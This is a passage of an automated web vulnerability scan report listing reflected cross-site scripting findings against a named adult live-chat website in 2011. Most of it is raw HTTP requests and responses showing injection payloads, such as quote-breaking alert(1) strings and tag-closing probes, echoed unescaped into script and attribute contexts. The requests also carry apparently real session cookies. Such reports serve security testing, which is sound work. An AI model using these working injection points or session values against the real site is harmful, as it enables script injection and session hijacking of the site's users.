ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:29 GMT Connection: close Content-Length: 52326 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/competitionspage.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video/?b11eb'-alert(1)-'f3d704a6f4f=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
4.516. http://imlive.com/live-sex-chats/gay-couple/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/gay-couple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20260"><a>39ff4f914a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/gay-couple/?20260"><a>39ff4f914a4=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:20:49 GMT Connection: close Content-Length: 34182 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/gay-couple/?20260"><a>39ff4f914a4=1"> ...[SNIP]...
4.517. http://imlive.com/live-sex-chats/gay-couple/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/gay-couple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2072'-alert(1)-'fe8b9fbca10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/gay-couple/?d2072'-alert(1)-'fe8b9fbca10=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:20:59 GMT Connection: close Content-Length: 34366 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay-couple/?d2072'-alert(1)-'fe8b9fbca10=1&qs=cat=1^roomid=52^d2072'-alert(1)-'fe8b9fbca10=1&qs=cat=1^roomid=52^d2072'-alert(1)-'fe8b9fbca10=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
4.518. http://imlive.com/live-sex-chats/gay/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/gay/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b640"><a>ffa3e1dc7af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/gay/?3b640"><a>ffa3e1dc7af=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:00 GMT Connection: close Content-Length: 195797 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/gay/?3b640"><a>ffa3e1dc7af=1"> ...[SNIP]...
4.519. http://imlive.com/live-sex-chats/gay/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/gay/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4cfa'-alert(1)-'0c9972c192e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/gay/?d4cfa'-alert(1)-'0c9972c192e=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:28 GMT Connection: close Content-Length: 195962 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay/?d4cfa'-alert(1)-'0c9972c192e=1&qs=cat=1^roomid=53^d4cfa'-alert(1)-'0c9972c192e=1&qs=cat=1^roomid=53^d4cfa'-alert(1)-'0c9972c192e=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
4.520. http://imlive.com/live-sex-chats/guy-alone/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/guy-alone/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b427'-alert(1)-'a0cb4a3aa6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/guy-alone/?5b427'-alert(1)-'a0cb4a3aa6b=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:39 GMT Connection: close Content-Length: 70611 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/guy-alone/?5b427'-alert(1)-'a0cb4a3aa6b=1&qs=cat=1^roomid=54^5b427'-alert(1)-'a0cb4a3aa6b=1&qs=cat=1^roomid=54^5b427'-alert(1)-'a0cb4a3aa6b=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
4.521. http://imlive.com/live-sex-chats/guy-alone/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/guy-alone/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88b77"><a>0945077855 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/guy-alone/?88b77"><a>0945077855=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:25 GMT Connection: close Content-Length: 70405 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/guy-alone/?88b77"><a>0945077855=1"> ...[SNIP]...
4.522. http://imlive.com/live-sex-chats/happyhour/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/happyhour/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f3c"><a>aec254de933 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/happyhour/?82f3c"><a>aec254de933=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:15 GMT Connection: close Content-Length: 22814 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/happyhour/?82f3c"><a>aec254de933=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
4.523. http://imlive.com/live-sex-chats/happyhour/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/happyhour/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95f8e'-alert(1)-'12b8116e5e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/happyhour/?95f8e'-alert(1)-'12b8116e5e2=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:38 GMT Connection: close Content-Length: 22962 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/happyhour.aspx&he=imlive.com&ul=/live-sex-chats/happyhour/?95f8e'-alert(1)-'12b8116e5e2=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
